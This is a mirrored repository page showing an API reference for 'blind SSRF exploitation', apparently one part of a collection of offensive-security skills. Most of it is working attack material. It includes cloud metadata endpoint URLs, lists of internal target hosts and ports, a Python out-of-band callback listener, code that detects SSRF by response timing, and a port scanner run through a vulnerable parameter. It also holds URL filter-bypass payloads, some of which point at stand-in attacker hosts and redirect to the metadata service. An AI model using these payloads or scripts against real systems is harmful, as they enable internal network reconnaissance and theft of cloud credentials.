creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-12 14:14:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
Anthropic-Cybersecurity-Skills/skills/performing-blind-ssrf-exploitation/references/api-reference.md
T
mukul975 c47eed6a64 Production hardening: security fixes, code quality, 724 skills complete 
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
2026-03-19 13:26:49 +01:00

5.0 KiB
Raw Permalink Blame History

API Reference: Blind SSRF Exploitation

Libraries Used

Library Purpose
requests Send crafted HTTP requests with SSRF payloads
socket Low-level port scanning and connection testing
http.server Out-of-band callback listener for blind detection
urllib.parse Construct and encode SSRF payload URLs
time Measure response timing for time-based blind SSRF

Installation

pip install requests

Techniques and Payloads

Cloud Metadata Endpoints

Cloud Provider Metadata URL
AWS IMDSv1 http://169.254.169.254/latest/meta-data/
AWS IMDSv2 Requires X-aws-ec2-metadata-token header
GCP http://metadata.google.internal/computeMetadata/v1/
Azure http://169.254.169.254/metadata/instance?api-version=2021-02-01
DigitalOcean http://169.254.169.254/metadata/v1/
Oracle Cloud http://169.254.169.254/opc/v2/instance/

Internal Network Scanning Payloads

# Common internal targets for blind SSRF probing
INTERNAL_TARGETS = [
    "http://127.0.0.1:{port}",
    "http://localhost:{port}",
    "http://0.0.0.0:{port}",
    "http://[::1]:{port}",
    "http://10.0.0.1:{port}",
    "http://192.168.1.1:{port}",
    "http://172.16.0.1:{port}",
]

COMMON_PORTS = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9200, 27017]

Core Functions

Out-of-Band (OOB) Blind SSRF Detection

import requests
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler

class CallbackHandler(BaseHTTPRequestHandler):
    received = []

    def do_GET(self):
        CallbackHandler.received.append({
            "path": self.path,
            "headers": dict(self.headers),
            "client": self.client_address[0],
        })
        self.send_response(200)
        self.end_headers()

    def log_message(self, format, *args):
        pass  # Suppress console output

def start_callback_server(port=8888):
    server = HTTPServer(("0.0.0.0", port), CallbackHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server

def test_blind_ssrf_oob(target_url, param_name, callback_url):
    """Test for blind SSRF using OOB callback."""
    payload = callback_url + "/ssrf-test"
    resp = requests.get(
        target_url,
        params={param_name: payload},
        timeout=10,
    )
    return resp.status_code

Time-Based Blind SSRF Detection

import time

def test_time_based_ssrf(target_url, param_name, open_port_url, closed_port_url):
    """Detect SSRF via response time difference between open and closed ports."""
    # Baseline: request to a closed port (should timeout slower)
    start = time.time()
    try:
        requests.get(target_url, params={param_name: closed_port_url}, timeout=15)
    except requests.Timeout:
        pass
    closed_time = time.time() - start

    # Test: request to an open port (should respond faster)
    start = time.time()
    try:
        requests.get(target_url, params={param_name: open_port_url}, timeout=15)
    except requests.Timeout:
        pass
    open_time = time.time() - start

    # Significant time difference indicates SSRF
    return {
        "open_port_time": round(open_time, 2),
        "closed_port_time": round(closed_time, 2),
        "likely_ssrf": abs(closed_time - open_time) > 2.0,
    }

Internal Port Scanner via SSRF

def ssrf_port_scan(target_url, param_name, internal_host, ports):
    """Scan internal ports through a blind SSRF vulnerability."""
    results = {"open": [], "closed": [], "filtered": []}
    for port in ports:
        ssrf_url = f"http://{internal_host}:{port}/"
        start = time.time()
        try:
            resp = requests.get(
                target_url,
                params={param_name: ssrf_url},
                timeout=10,
            )
            elapsed = time.time() - start
            if resp.status_code == 200 and elapsed < 3:
                results["open"].append(port)
            else:
                results["closed"].append(port)
        except requests.Timeout:
            results["filtered"].append(port)
    return results

URL Bypass Techniques

BYPASS_PAYLOADS = [
    # Decimal IP encoding
    "http://2130706433/",           # 127.0.0.1
    # Hex encoding
    "http://0x7f000001/",           # 127.0.0.1
    # Octal encoding
    "http://0177.0.0.1/",
    # IPv6
    "http://[::ffff:127.0.0.1]/",
    # URL encoding
    "http://127.0.0.1%2523@evil.com/",
    # DNS rebinding
    "http://spoofed.burpcollaborator.net/",
    # Redirect-based
    "https://attacker.com/redirect?url=http://169.254.169.254/",
]

Output Format

{
  "target": "https://app.example.com/fetch",
  "parameter": "url",
  "ssrf_confirmed": true,
  "detection_method": "out-of-band",
  "internal_services_found": [
    {"host": "127.0.0.1", "port": 6379, "service": "Redis"},
    {"host": "10.0.0.5", "port": 3306, "service": "MySQL"}
  ],
  "cloud_metadata_accessible": true,
  "bypasses_needed": ["decimal IP encoding"]
}
Reference in New Issue View Git Blame Copy Permalink